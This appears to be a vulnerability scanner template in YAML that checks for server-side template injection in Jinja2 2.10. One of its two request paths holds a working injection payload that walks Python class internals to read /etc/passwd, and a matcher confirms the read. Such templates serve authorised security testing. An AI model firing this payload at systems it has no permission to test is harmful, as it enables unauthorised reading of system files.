id: ssti

info:
  name: Jinja2 2.10 - SSTI
  author: pikpikcu
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}{{100*285}}"
      - "{{BaseURL}}{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}"
    matchers:   
      - type: word
        words:
          - "28500"
          - "root:x:0:0:root:"
        part: body

